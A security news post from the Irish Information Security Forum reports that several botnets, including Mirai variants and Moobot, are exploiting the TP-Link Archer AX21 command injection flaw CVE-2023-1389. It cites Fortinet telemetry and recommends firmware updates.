×

Irish Information Security Forum

Botnets Continue to Exploit Unpatched TP-Link Routers

 

Multiple botnets are continuing to exploit a year-old flaw in unpatched TP-Link routers.

 

The flaw, identified as CVE-2023-1389, is a high-severity unauthenticated command injection problem in the locale API reachable through the TP-Link Archer AX21 web management interface.

 

The flaw was discovered by several researchers in January 2023 and reported to the vendor through the Zero-Day Initiative (ZDI)¹. TP-Link addressed the problem with the release of firmware security updates in March 2023¹. However, despite the vendor's release of a security update last year, a significant number of users continue to use outdated firmware¹.

 

At least six distinct botnet malware operations are hunting for TP-Link Archer AX21 (AX1800) routers vulnerable to this security issue¹. These botnets include Moobot, Miori, AGoent, a Gafgyt variant, and variants of the infamous Mirai botnetā“. Each of these botnets utilizes different methods and scripts to exploit the vulnerability, establish control over the compromised devices, and command them to take part in malicious activities such as distributed denial of service (DDoS) attacks¹.

 

Recently, Fortinet issued a warning saying that it observed a surge in the malicious activity exploiting the vulnerability, noting that it originated from six botnet operations¹. Fortinet's telemetry data shows that starting in March 2024, daily infection attempts leveraging CVE-2023-1389 often went beyond 40,000 and up to 50,000¹.

 

tp-link Archer AX21 web management interface
tp-link-Archer AX webmanagement interface

 

The continued exploitation of this year-old vulnerability highlights the importance of regular firmware updates and the need for users to ensure their devices are not left vulnerable to such attacks. 

 

 


References
(1) Multiple botnets exploiting one-year-old TP-Link flaw to hack routers. https://www.bleepingcomputer.com/news/security/multiple-botnets-exploiting-one-year-old-tp-link-flaw-to-hack-routers/.
(2) Surge in Botnets Exploiting CVE-2023-1389 to Infect TP-Link Archer Routers. https://heimdalsecurity.com/blog/tp-link-archer-command-injection-vulnerability/.
(3) TP-Link routers are still being bombarded with botnet and malware threats. https://www.msn.com/en-ae/news/other/tp-link-routers-are-still-being-bombarded-with-botnet-and-malware-threats/ar-AA1ngnaf.
(4) Various Botnets Pummel Year-Old TP-Link Flaw in IoT Attacks. https://www.darkreading.com/ics-ot-security/various-botnets-pummel-tp-link-flaw-iot-attacks.

IISF Logo

If you are interested in finding out more about the IISF, or would like to attend one of our Chapter Meetings as an invited guest, please contact the
IISF Secretary:

By email:
secretary@iisf.ie

By post:

David Cahill

Information Security

GPO, 1-117
D01 F5P2

Enhance your Cybersecurity knowledge and learn from those at the coalface of information Security in Ireland

 


Forum SPONSORS 

Invitations for Annual Sponsorship of IISF has now reopened.

Sponsorship of IISF Opportunity
(your logo & profile link here)

 

Sponsors are featured prominently throughout the IISF.IE website, social media channels as well as enjoying other benefits Read more

 

secured by edgescan digital security radar logo

© iiSf. All rights reserved. CRN: 3400036GH  - Privacy  - Sponsorship  - Cybersecurity News Index  - Cybersecurity Resources  - X  - Produced by
LinkedIn Twitter